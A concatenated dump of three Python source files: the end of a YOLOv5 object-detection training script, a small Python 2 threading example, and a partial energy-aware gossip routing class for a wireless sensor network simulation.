mem = '%.3gG' % (torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0) # (GB)
s = ('%10s' * 2 + '%10.4g' * 6) % (
'%g/%g' % (epoch, epochs - 1), mem, *mloss, targets.shape[0], imgs.shape[-1])
pbar.set_description(s)
# Plot
if plots and ni < 3:
f = save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
# if tb_writer:
# tb_writer.add_image(f, result, dataformats='HWC', global_step=epoch)
# tb_writer.add_graph(model, imgs) # add model to tensorboard
elif plots and ni == 10 and wandb:
wandb.log({"Mosaics": [wandb.Image(str(x), caption=x.name) for x in save_dir.glob('train*.jpg')
if x.exists()]}, commit=False)
# end batch ------------------------------------------------------------------------------------------------
# end epoch ----------------------------------------------------------------------------------------------------
# Scheduler
lr = [x['lr'] for x in optimizer.param_groups] # for tensorboard
scheduler.step()
# DDP process 0 or single-GPU
if rank in [-1, 0]:
# mAP
ema.update_attr(model, include=['yaml', 'nc', 'hyp', 'gr', 'names', 'stride', 'class_weights'])
final_epoch = epoch + 1 == epochs
if not opt.notest or final_epoch: # Calculate mAP
results, maps, times = test.test(opt.data,
batch_size=batch_size * 2,
imgsz=imgsz_test,
model=ema.ema,
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
verbose=nc < 50 and final_epoch,
plots=plots and final_epoch,
log_imgs=opt.log_imgs if wandb else 0,
compute_loss=compute_loss)
# Write
with open(results_file, 'a') as f:
f.write(s + '%10.4g' * 7 % results + '\n') # append metrics, val_loss
if len(opt.name) and opt.bucket:
os.system('gsutil cp %s gs://%s/results/results%s.txt' % (results_file, opt.bucket, opt.name))
# Log
tags = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95',
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for x, tag in zip(list(mloss[:-1]) + list(results) + lr, tags):
if tb_writer:
tb_writer.add_scalar(tag, x, epoch) # tensorboard
if wandb:
wandb.log({tag: x}, step=epoch, commit=tag == tags[-1]) # W&B
# Update best mAP
fi = fitness(np.array(results).reshape(1, -1)) # weighted combination of [P, R, mAP@.5, mAP@.5-.95]
if fi > best_fitness:
best_fitness = fi
# Save model
if (not opt.nosave) or (final_epoch and not opt.evolve): # if save
ckpt = {'epoch': epoch,
'best_fitness': best_fitness,
'training_results': results_file.read_text(),
'model': deepcopy(model.module if is_parallel(model) else model).half(),
'ema': deepcopy(ema.ema).half(),
'updates': ema.updates,
'optimizer': optimizer.state_dict(),
'wandb_id': wandb_run.id if wandb else None}
# Save last, best and delete
torch.save(ckpt, last)
if best_fitness == fi:
torch.save(ckpt, best)
del ckpt
# end epoch ----------------------------------------------------------------------------------------------------
# end training
if rank in [-1, 0]:
# Strip optimizers
final = best if best.exists() else last # final model
for f in last, best:
if f.exists():
strip_optimizer(f)
if opt.bucket:
os.system(f'gsutil cp {final} gs://{opt.bucket}/weights') # upload
# Plots
if plots:
plot_results(save_dir=save_dir) # save as results.png
if wandb:
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
wandb.log({"Results": [wandb.Image(str(save_dir / f), caption=f) for f in files
if (save_dir / f).exists()]})
if opt.log_artifacts:
wandb.log_artifact(artifact_or_path=str(final), type='model', name=save_dir.stem)
# Test fp60_best.pt
logger.info('%g epochs completed in %.3f hours.\n' % (epoch - start_epoch + 1, (time.time() - t0) / 3600))
if opt.data.endswith('coco.yaml') and nc == 80: # if COCO
for m in (last, best) if best.exists() else (last): # speed, mAP tests
results, _, _ = test.test(opt.data,
batch_size=batch_size * 2,
imgsz=imgsz_test,
conf_thres=0.001,
iou_thres=0.7,
model=attempt_load(m, device).half(),
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
save_json=True,
plots=False)
else:
dist.destroy_process_group()
wandb.run.finish() if wandb and wandb.run else None
torch.cuda.empty_cache()
return results
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str, default='weights/yolov5m.pt', help='initial weights path')
parser.add_argument('--cfg', type=str, default='models/yolov5m.yaml', help='model.yaml path')
parser.add_argument('--data', type=str, default='data/FP60_family.yaml', help='data.yaml path')
parser.add_argument('--hyp', type=str, default='data/hyp.scratch.yaml', help='hyperparameters path')
parser.add_argument('--epochs', type=int, default=300)
parser.add_argument('--batch-size', type=int, default=4, help='total batch size for all GPUs')
parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, all_test] image sizes')
parser.add_argument('--rect', action='store_true', help='rectangular training')
parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
parser.add_argument('--notest', action='store_true', help='only all_test final epoch')
parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')
parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
parser.add_argument('--log-imgs', type=int, default=16, help='number of images for W&B logging, max 100')
parser.add_argument('--log-artifacts', action='store_true', help='log artifacts, i.e. final trained model')
parser.add_argument('--workers', type=int, default=8, help='maximum number of dataloader workers')
parser.add_argument('--project', default='runs/train', help='save to project/name')
parser.add_argument('--entity', default=None, help='W&B entity')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--quad', action='store_true', help='quad dataloader')
parser.add_argument('--linear-lr', action='store_true', help='linear LR')
opt = parser.parse_args()
# Set DDP variables
opt.world_size = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1
opt.global_rank = int(os.environ['RANK']) if 'RANK' in os.environ else -1
set_logging(opt.global_rank)
if opt.global_rank in [-1, 0]:
check_git_status()
check_requirements()
# Resume
if opt.resume: # resume an interrupted run
ckpt = opt.resume if isinstance(opt.resume, str) else get_latest_run() # specified or most recent path
assert os.path.isfile(ckpt), 'ERROR: --resume checkpoint does not exist'
apriori = opt.global_rank, opt.local_rank
with open(Path(ckpt).parent.parent / 'opt.yaml') as f:
opt = argparse.Namespace(**yaml.load(f, Loader=yaml.SafeLoader)) # replace
opt.cfg, opt.weights, opt.resume, opt.batch_size, opt.global_rank, opt.local_rank = '', ckpt, True, opt.total_batch_size, *apriori # reinstate
logger.info('Resuming training from %s' % ckpt)
else:
# opt.hyp = opt.hyp or ('hyp.finetune.yaml' if opt.weights else 'hyp.scratch.yaml')
opt.data, opt.cfg, opt.hyp = check_file(opt.data), check_file(opt.cfg), check_file(opt.hyp) # check files
assert len(opt.cfg) or len(opt.weights), 'either --cfg or --weights must be specified'
opt.img_size.extend([opt.img_size[-1]] * (2 - len(opt.img_size))) # extend to 2 sizes (train, all_test)
opt.name = 'evolve' if opt.evolve else opt.name
opt.save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok | opt.evolve) # increment run
# DDP mode
opt.total_batch_size = opt.batch_size
device = select_device(opt.device, batch_size=opt.batch_size)
if opt.local_rank != -1:
assert torch.cuda.device_count() > opt.local_rank
torch.cuda.set_device(opt.local_rank)
device = torch.device('cuda', opt.local_rank)
dist.init_process_group(backend='nccl', init_method='env://') # distributed backend
assert opt.batch_size % opt.world_size == 0, '--batch-size must be multiple of CUDA device count'
opt.batch_size = opt.total_batch_size // opt.world_size
# Hyperparameters
with open(opt.hyp) as f:
hyp = yaml.load(f, Loader=yaml.SafeLoader) # load hyps
# Train
logger.info(opt)
try:
import wandb
except ImportError:
wandb = None
prefix = colorstr('wandb: ')
logger.info(f"{prefix}Install Weights & Biases for YOLOv5 logging with 'pip install wandb' (recommended)")
if not opt.evolve:
tb_writer = None # init loggers
if opt.global_rank in [-1, 0]:
logger.info(f'Start Tensorboard with "tensorboard --logdir {opt.project}", view at http://localhost:6006/')
tb_writer = SummaryWriter(opt.save_dir) # Tensorboard
train(hyp, opt, device, tb_writer, wandb)
# Evolve hyperparameters (optional)
else:
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {'lr0': (1, 1e-5, 1e-1), # initial learning rate (SGD=1E-2, Adam=1E-3)
'lrf': (1, 0.01, 1.0), # final OneCycleLR learning rate (lr0 * lrf)
'momentum': (0.3, 0.6, 0.98), # SGD momentum/Adam beta1
'weight_decay': (1, 0.0, 0.001), # optimizer weight decay
'warmup_epochs': (1, 0.0, 5.0), # warmup epochs (fractions ok)
'warmup_momentum': (1, 0.0, 0.95), # warmup initial momentum
'warmup_bias_lr': (1, 0.0, 0.2), # warmup initial bias lr
'box': (1, 0.02, 0.2), # box loss gain
'cls': (1, 0.2, 4.0), # cls loss gain
'cls_pw': (1, 0.5, 2.0), # cls BCELoss positive_weight
'obj': (1, 0.2, 4.0), # obj loss gain (scale with pixels)
'obj_pw': (1, 0.5, 2.0), # obj BCELoss positive_weight
'iou_t': (0, 0.1, 0.7), # IoU training threshold
'anchor_t': (1, 2.0, 8.0), # anchor-multiple threshold
'anchors': (2, 2.0, 10.0), # anchors per output grid (0 to ignore)
'fl_gamma': (0, 0.0, 2.0), # focal loss gamma (efficientDet default gamma=1.5)
'hsv_h': (1, 0.0, 0.1), # image HSV-Hue augmentation (fraction)
'hsv_s': (1, 0.0, 0.9), # image HSV-Saturation augmentation (fraction)
'hsv_v': (1, 0.0, 0.9), # image HSV-Value augmentation (fraction)
'degrees': (1, 0.0, 45.0), # image rotation (+/- deg)
'translate': (1, 0.0, 0.9), # image translation (+/- fraction)
'scale': (1, 0.0, 0.9), # image scale (+/- gain)
'shear': (1, 0.0, 10.0), # image shear (+/- deg)
'perspective': (0, 0.0, 0.001), # image perspective (+/- fraction), range 0-0.001
'flipud': (1, 0.0, 1.0), # image flip up-down (probability)
'fliplr': (0, 0.0, 1.0), # image flip left-right (probability)
'mosaic': (1, 0.0, 1.0), # image mixup (probability)
'mixup': (1, 0.0, 1.0)} # image mixup (probability)
assert opt.local_rank == -1, 'DDP mode not implemented for --evolve'
opt.notest, opt.nosave = True, True # only all_test/save final epoch
# ei = [isinstance(x, (int, float)) for x in hyp.values()] # evolvable indices
yaml_file = Path(opt.save_dir) / 'hyp_evolved.yaml' # save best result here
if opt.bucket:
os.system('gsutil cp gs://%s/evolve.txt .' % opt.bucket) # download evolve.txt if exists
for _ in range(300): # generations to evolve
if Path('evolve.txt').exists(): # if evolve.txt exists: select best hyps and mutate
# Select parent(s)
parent = 'single' # parent selection method: 'single' or 'weighted'
x = np.loadtxt('evolve.txt', ndmin=2)
n = min(5, len(x)) # number of previous results to consider
x = x[np.argsort(-fitness(x))][:n] # top n mutations
w = fitness(x) - fitness(x).min() # weights
if parent == 'single' or len(x) == 1:
# x = x[random.randint(0, n - 1)] # random selection
x = x[random.choices(range(n), weights=w)[0]] # weighted selection
elif parent == 'weighted':
x = (x * w.reshape(n, 1)).sum(0) / w.sum() # weighted combination
# Mutate
mp, s = 0.8, 0.2 # mutation probability, sigma
npr = np.random
npr.seed(int(time.time()))
g = np.array([x[0] for x in meta.values()]) # gains 0-1
ng = len(meta)
v = np.ones(ng)
while all(v == 1): # mutate until a change occurs (prevent duplicates)
v = (g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1).clip(0.3, 3.0)
for i, k in enumerate(hyp.keys()): # plt.hist(v.ravel(), 300)
hyp[k] = float(x[i + 7] * v[i]) # mutate
# Constrain to limits
for k, v in meta.items():
hyp[k] = max(hyp[k], v[1]) # lower limit
hyp[k] = min(hyp[k], v[2]) # upper limit
hyp[k] = round(hyp[k], 5) # significant digits
# Train mutation
results = train(hyp.copy(), opt, device, wandb=wandb)
# Write mutation results
print_mutation(hyp.copy(), results, yaml_file, opt.bucket)
# Plot results
plot_evolution(yaml_file)
print(f'Hyperparameter evolution complete. Best results saved as: {yaml_file}\n'
f'Command to train a new model with these hyperparameters: $ python run_yolov5_train.py --hyp {yaml_file}')
|
mtsleepD.py
|
#!/usr/bin/env python
import threading
from time import sleep, ctime
loops = [4,2]
class ThreadFunc(object):
def __init__(self, func, args, name=''):
self.name = name
self.func = func
self.args = args
def __call__(self):
self.func(*self.args)
def loop(nloop, nsec):
print 'start loop', nloop, 'at:', ctime()
sleep(nsec)
print 'loop', nloop, 'done at:', ctime()
def main():
print 'starting at:', ctime()
threads=[]
nloops = range(len(loops))
for i in nloops:
t = threading.Thread(
target=ThreadFunc(loop, (i, loops[i]),
loop.__name__)
)
threads.append(t)
for i in nloops:
threads[i].start()
for i in nloops:
threads[i].join()
print 'all DONE at:', ctime()
if __name__ == '__main__':
main()
|
networkEAGPD.py
|
#!/usr/bin/env python3.7
"""
Router class is part of a dissertation work about WSNs
"""
__author__ = "Bruno Chianca Ferreira"
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Bruno Chianca Ferreira"
__email__ = "brunobcf@gmail.com"
import socket, os, math, struct, sys, json, traceback, zlib, fcntl, threading
import time
from apscheduler.schedulers.background import BackgroundScheduler
from collections import deque
class Network():
def __init__(self, Node, Battery, port=56123, tmax = 100, net_trans = 'ADHOC'):
'Initializes the properties of the Node object'
#### SENSOR ###############################################################################
self.Node = Node
self.visible = [] #our visibble neighbours
self.messages_created = [] #messages created by each node
self.messages_delivered = [] #messages delivered at the sink
self.messages = []
self.average = 0
self.visible_timeout = 3 * (Node.sleeptime / 1000) #timeout when visible neighbours should be removed from list in ms
#### NETWORK ##############################################################################
self.net_trans = net_trans #adhoc or sixLoWPANLink
#print(self.net_trans)
if self.net_trans == 'ADHOC':
self.bcast_group = '10.0.0.255' #broadcast ip address
elif self.net_trans == 'SIXLOWPANLINK':
self.bcast_group = 'ff02::1'
self.port = port # UDP port
self.max_packet = 65535 #max packet size to listen
#### UTILITIES ############################################################################
self.scheduler = BackgroundScheduler()
self.scheduler.start()
self.monitor_mode = False #when this is true a lot of messages polute the screen
self.protocol_stats = [0,0,0,0,0,0] #created, forwarded, delivered, discarded, digest sent, request attended
self.errors = [0,0,0]
self.myip = ''
#### Protocol specific ####################################################################
self.ttl = 8
self.fanout_max = 3
self.tmax = tmax * Node.second # Maximum time interval a node can wait until send a message (milliseconds)
self.tnext = self.tmax # The time interval the local node will wait until forwarding current message (in milliseconds)
self.bt_level = [] # Battery level in node i (in a range between 1 and 10, where 1 means that remains less than 10% of battery)
self.v_bt = [] #A vector containing the energy level of all neighbour nodes ## NOT NEEDED IN THIS IMPLEMENTATION
self.mode = "eager" #1 -> eager, 0 ->lazy Starts lazy, later check if should be changed to eager
self.netRatio = 0 # ratio -> forwarded / discarded
self.tSinkMax = 500 #max time sink without new message, after that stop simulation
self.tSinkCurrent = 0 #current time with no new message
self.packets = 0
self.traffic = 0
self.battery_percent_old = 0
self.backlog = deque([],5000)
self.history = deque([],1000)
self.digest = deque([],1000)
self.digests_received = deque([],5000)
##################### END OF DEFAULT SETTINGS ###########################################################
self._setup() #Try to get settings from file
self.t2 = threading.Thread(target=self._listener, args=())
self.t2.start()
self.scheduler.add_job(self._digest, 'interval', seconds = (self.tmax * 10) / 1000, id='digest')
######## PUBLIC ##############################################################################
def awake_callback(self):
'Callback function ran when the node wakes up'
if (self.Node.role!="sink"):
if len(self.visible) > 0: #only change state if it has any visible
self._update_visible() #clean the list of visible
self.tnext =self._calc_tnext()
if self.Node.Battery.battery_percent != self.battery_percent_old:
self._update_mode()
self.battery_percent_old = self.Node.Battery.battery_percent
else:
self._checkNewMessage()
def dispatch(self, payload):
'Public method available for sending messages. '
self._sender(payload)
def shutdown(self):
'Public method available for shuting down a node'
self.t2.join(timeout=2)
self.scheduler.shutdown()
def printvisible(self):
'Prints visible nodes'
print("Visible neighbours at:" + str(self.Node.simulation_seconds) )
print("===============================================================================")
print("|IP\t\t|Last seen\t|Battery level")
print("-------------------------------------------------------------------------------")
for member in range(len(self.visible)):
print ("|"+self.visible[member][0]+"\t|"+str(self.visible[member][1])+"\t\t|"+str(self.visible[member][2]))
print("===============================================================================")
def printinfo(self):
'Prints general information about the network layer'
print()
print("EAGPD - Routing agent")
print()
#print("current value: \t\t{0:5.2f}".format(self.value))
print("battery level: \t\t{0:5.2f} Joules".format(self.Node.Battery.battery_energy))
print("battery level: \t\t{0:5.2f} %".format(self.Node.Battery.battery_percent))
print("average level: \t\t{0:5.2f} 0-100".format(self.average))
print("node tmax: \t\t" + str(self.tmax/self.Node.multiplier)+ " ms in virtual time")
print("node tnext: \t\t" + str(self.tnext/self.Node.multiplier)+ " ms in virtual time")
#print("local address: \t\t"+str(self.myip))
print("node mode: \t\t" + str(self.mode))
print("node ttl max: \t\t" + str(self.ttl))
#print("udp port: \t\t"+str(self.port))
if self.Node.role == 'mote':
print("msgs created: \t\t"+str(self.protocol_stats[0]))
print("msgs forwarded: \t"+str(self.protocol_stats[1]))
print("msgs discarded: \t"+str(self.protocol_stats[3]))
print("digests sent: \t\t"+str(self.protocol_stats[4]))
print("digests buffer: \t"+str(len(self.digest)))
print("request attended: \t"+str(self.protocol_stats[5]))
print("msgs buffer: \t\t"+str(len(self.scheduler.get_jobs())))
elif self.Node.role == 'sink':
print("msgs delivered: \t"+str(self.protocol_stats[2]))
print("starvation time: \t"+str(self.tSinkCurrent))
print("starvation max: \t"+str(self.tSinkMax))
print("Network ratio: \t\t"+str(self.netRatio))
print("errors: \t\t" + str(self.errors[0]) + ','+ str(self.errors[1]) + ',' + str(self.errors[2]))
print()
print("Network ratio is just the number of discarded messages divided by")
print("the number of created messages. A node with high ratio is busier.")
print()
######## PRIVATE ##############################################################################
def _listener(self):
'This method opens a UDP socket to receive data. It runs in infinite loop as long as the node is up'
addrinfo = socket.getaddrinfo(self.bcast_group, None)[1]
listen_socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM) #UDP
listen_socket.bind(('', self.port))
self.myip = self._get_ip('eth0')
#self.myip = self._get_ip(str(self.Node.tag)+'-wlan0')
if (self.net_trans=='SIXLOWPANLINK'):
group_bin = socket.inet_pton(addrinfo[0], addrinfo[4][0])
mreq = group_bin + struct.pack('@I', 0)
listen_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
while self.Node.lock: #this infinity loop handles the received packets
payload, sender = listen_socket.recvfrom(self.max_packet)
payload = json.loads(payload.decode())
sender_ip = str(sender[0])
self.packets += 1
self._packet_handler(payload, sender_ip)
listen_socket.close()
def _sender(self, payload, fasttrack=False):
'This method sends an epidemic message with the data read by the sensor'
start = time.monotonic_ns()/1000000
addrinfo = socket.getaddrinfo(self.bcast_group, None)[1]
#getting the first one [0] is related to stream, [1] dgram and [2] raw
#addrinfo[0] is the address family, which is same for stream dgram ow raw
sender_socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
if (self.net_trans=='SIXLOWPANLINK'):
ttl_bin = struct.pack('@i', 1) #ttl=1
sender_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ttl_bin)
elif (self.net_trans=='ADHOC'):
sender_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
msg_id = zlib.crc32(str((self.Node.simulation_seconds+payload)).encode())
self.messages_created.append([hex(msg_id),self.Node.simulation_seconds])
if fasttrack:
bytes_to_send = json.dumps([4 , hex(msg_id), self.Node.tag, 0, self.Node.simulation_seconds, self.ttl, self.Node.Battery.battery_percent,'',0, payload]).encode()
else:
bytes_to_send = json.dumps([2 , hex(msg_id), self.Node.tag, 0, self.Node.simulation_seconds, self.ttl, self.Node.Battery.battery_percent,'',0, payload]).encode()
sender_socket.sendto(bytes_to_send, (addrinfo[4][0], self.port))
self.Node.Battery.communication_energy += self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start, self.Node.Battery.tx_time * self.Node.Battery.tx_current)
sender_socket.close()
def _packet_sender(self, packet, fasttrack=False):
'This method sends an epidemic message with the data read by the sensor'
start = time.monotonic_ns()/1000000
addrinfo = socket.getaddrinfo(self.bcast_group, None)[1]
sender_socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
if (self.net_trans=='SIXLOWPANLINK'):
ttl_bin = struct.pack('@i', 1) #ttl=1
sender_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ttl_bin)
elif (self.net_trans=='ADHOC'):
sender_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
if fasttrack:
bytes_to_send = json.dumps([4 , packet[1], packet[2], packet[3], packet[4], self.ttl, self.Node.Battery.battery_percent,'',packet[8], packet[9]]).encode()
else:
bytes_to_send = json.dumps([2 , packet[1], packet[2], packet[3], packet[4], self.ttl, self.Node.Battery.battery_percent,'',packet[8], packet[9]]).encode()
sender_socket.sendto(bytes_to_send, (addrinfo[4][0], self.port))
self.Node.Battery.communication_energy += self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start, self.Node.Battery.tx_time * self.Node.Battery.tx_current)
sender_socket.close()
def _packet_handler(self, packet, sender_ip):
'When a message of type gossip is received from neighbours this method unpacks and handles it'
start = time.monotonic_ns()/1000000
packet[5] -= 1 #Dedutc TTL
packet[8] += 1 #Increase hops
if (packet[2] != self.Node.tag):
if len(self.visible) > 0: #list no empty, check if already there
not_there = 1
for element in range(len(self.visible)):
if sender_ip == self.visible[element][0]: #if there...
self.visible[element][1] = self.Node.simulation_seconds # refresh timestamp
self.visible[element][2] = packet[6] # refresh battery level
not_there = 0
break
if not_there:
self.visible.append([sender_ip, self.Node.simulation_seconds, packet[6]])
else: #Empty neighbours list, add
self.visible.append([sender_ip, self.Node.simulation_seconds, packet[6]])
if self.Node.role == "sink":
self._sink(packet)
else:
self._node_message(packet)
if packet[5] <= 0: #check if ttl is over
self.protocol_stats[3] +=1
elif packet[7] != self.myip: #check if came from me before
packet[7] = sender_ip
if packet[0] == 3: #is it a request?
for id in packet[9]:
for message in self.backlog:
if id in message:
#print(id + " id and message: " + str(message))
self.protocol_stats[5] +=1
self._packet_sender(message, fasttrack=False)
self.backlog.remove(message)
break
if (packet[0] == 1): #is it a digest?
if packet[1] not in self.digests_received:
self.digests_received.append(packet[1])
request = []
for id in packet[9]:
for message in self.history:
if id in message:
break
else:
request.append(id)
if (len(request) > 0):
self._send_request(request)
if self.monitor_mode: print("sent a request with size: " + str(len(request)))
self._forwarder(packet)
return
if packet[0] == 4: #fasttrack, send it pronto
self._forwarder(packet)
else:
if self.mode == 'eager':
try:
self.scheduler.remove_job(packet[1])
self.protocol_stats[3] +=1
except:
self.scheduler.add_job(self._forwarder, 'interval', seconds = self.tnext/1000, id=packet[1], args=[packet])
pass
elif self.mode == 'lazy':
try:
self.scheduler.remove_job(packet[1])
self.protocol_stats[3] +=1
if packet[0] == 2:
if packet[8] <= self.ttl:
self.backlog.append(packet)
self.digest.append(packet[1])
except:
self.scheduler.add_job(self._forwarder, 'interval', seconds = self.tnext/1000, id=packet[1], args=[packet])
pass
else:
self.protocol_stats[3] +=1
self.Node.Battery.communication_energy += self.Node.Battery.battery_drainer(0, start, self.Node.Battery.rx_current * self.Node.Battery.rx_time)
self.Node.Battery.computational_energy += self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start)
def _sink(self, packet):
'Handles messages received at the sink'
# This method does not use energy, only for simulation statistics
if (packet[0] == 1):
if packet[1] not in self.digests_received:
self.digests_received.append(packet[1])
request = []
for id in packet[9]:
for message in self.messages_delivered:
if id in message:
break
else:
request.append(id)
if (len(request) > 0):
self._send_request(request)
if self.monitor_mode: print("sent a request with size: " + str(len(request)))
return
else: return
elif (packet[0] == 3):
return
if len(self.messages_delivered) > 0:
for element in range(len(self.messages_delivered)): #check if it's a new message
if self.messages_delivered[element][0] == packet[1]: #we already delivered that one
self.messages_delivered[element][4] += 1 #increment counter
if (packet[8]>self.messages_delivered[element][5]): #calculate max and min hops
self.messages_delivered[element][5]=packet[8]
elif (packet[8]<self.messages_delivered[element][6]):
self.messages_delivered[element][6]=packet[8]
self.protocol_stats[2] += 1
not_delivered = False
break
else: #new message
not_delivered = True
else: #fresh list, add directly
not_delivered = True
if not_delivered:
self.messages_delivered.append([packet[1],packet[2],packet[4],self.Node.simulation_seconds,1,packet[8],packet[8]]) #add with counter 1
self.protocol_stats[2] += 1
self.tSinkCurrent = 0
def _node_message(self, packet):
if len(self.messages) > 0:
for element in range(len(self.messages)): #check if it's a new message
if self.messages[element][0] == packet[1]: #we already delivered that one
self.messages[element][4] += 1 #increment counter
if (packet[8]>self.messages[element][5]): #calculate max and min hops
self.messages[element][5]=packet[8]
elif (packet[8]<self.messages[element][6]):
self.messages[element][6]=packet[8]
not_delivered = False
break
else: #new message
not_delivered = True
else: #fresh list, add directly
not_delivered = True
if not_delivered:
self.history.append(packet[1])
self.messages.append([packet[1],packet[2],packet[4],self.Node.simulation_seconds,1,packet[8],packet[8]]) #add with counter 1
def _forwarder(self, packet):
'This method forwards a received gossip package to all neighbours'
start = time.monotonic_ns()/1000000
addrinfo = socket.getaddrinfo(self.bcast_group, None)[1] #getting the first one [0] is related to stream, [1] dgram and [2] raw
#addrinfo[0] is the address family, which is same for stream dgram ow raw
forwarder_socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
if (self.net_trans=='SIXLOWPANLINK'):
ttl_bin = struct.pack('@i', 1) #ttl=1
forwarder_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ttl_bin)
elif (self.net_trans=='ADHOC'):
forwarder_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
bytes_to_send = json.dumps([packet[0] , packet[1], packet[2], packet[3], packet[4], packet[5], self.Node.Battery.battery_percent, packet[7], packet[8], packet[9]]).encode()
forwarder_socket.sendto(bytes_to_send, (addrinfo[4][0], self.port))
self.protocol_stats[1] += 1
forwarder_socket.close()
self.Node.Battery.communication_energy += self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start, self.Node.Battery.tx_time * self.Node.Battery.tx_current)
try:
self.scheduler.remove_job(packet[1])
except:
if self.monitor_mode == True: print("FWD - Issue trying to remove fwd task")
self.errors[2] += 1
pass
def _digest(self):
start = time.monotonic_ns()/1000000
if len(self.digest) < 1: #do nothing if there is no digest
return
addrinfo = socket.getaddrinfo(self.bcast_group, None)[1]
digest_socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
if (self.net_trans=='SIXLOWPANLINK'):
ttl_bin = struct.pack('@i', 1) #ttl=1
digest_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ttl_bin)
elif (self.net_trans=='ADHOC'):
digest_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
msg_id = zlib.crc32(str((self.Node.simulation_seconds)).encode())
bytes_to_send = json.dumps([1 , hex(msg_id), self.Node.tag, 0, self.Node.simulation_seconds, self.ttl, self.Node.Battery.battery_percent,'',0, list(self.digest)]).encode()
self.digest.clear()
digest_socket.sendto(bytes_to_send, (addrinfo[4][0], self.port))
self.protocol_stats[4] += 1
digest_socket.close()
self.Node.Battery.communication_energy += self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start, self.Node.Battery.tx_time * self.Node.Battery.tx_current)
def _send_request(self, request):
start = time.monotonic_ns()/1000000
addrinfo = socket.getaddrinfo(self.bcast_group, None)[1]
request_socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
if (self.net_trans=='SIXLOWPANLINK'):
ttl_bin = struct.pack('@i', 1) #ttl=1
request_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ttl_bin)
elif (self.net_trans=='ADHOC'):
request_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
msg_id = zlib.crc32(str((self.Node.simulation_seconds)).encode())
bytes_to_send = json.dumps([3 , hex(msg_id), self.Node.tag, 0, self.Node.simulation_seconds, self.ttl, self.Node.Battery.battery_percent,'',0, request]).encode()
request_socket.sendto(bytes_to_send, (addrinfo[4][0], self.port))
#self.protocol_stats[4] += 1
request_socket.close()
self.Node.Battery.communication_energy += self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start, self.Node.Battery.tx_time * self.Node.Battery.tx_current)
def _checkNewMessage(self):
'Just to check if sink is still receiving messages, if not ends simulation'
#this is for sink only
if (self.tSinkCurrent > self.tSinkMax): #max time withtout new message. Shutdown simulation
self.Node.lock = False
def _update_visible(self):
'Update the energy state for local cluster. Old nodes are removed and local average recalculated'
start = time.monotonic_ns()/1000000
for member in range(len(self.visible)):
if (self.Node.simulation_seconds- self.visible[member][1] > self.visible_timeout):
del self.visible[member]
break
self.average = 0
self.n_vis = len(self.visible)
self.bmax = self.Node.Battery.battery_percent
self.bmin = self.Node.Battery.battery_percent
for member in range(self.n_vis):
self.average += self.visible[member][2]
if self.visible[member][2] > self.bmax:
self.bmax = self.visible[member][2] #when bmax is 0, this should always happen
elif self.visible[member][2] < self.bmin:
self.bmin = self.visible[member][2] #
if self.n_vis > 0:
self.average = round(self.average / (self.n_vis))
else:
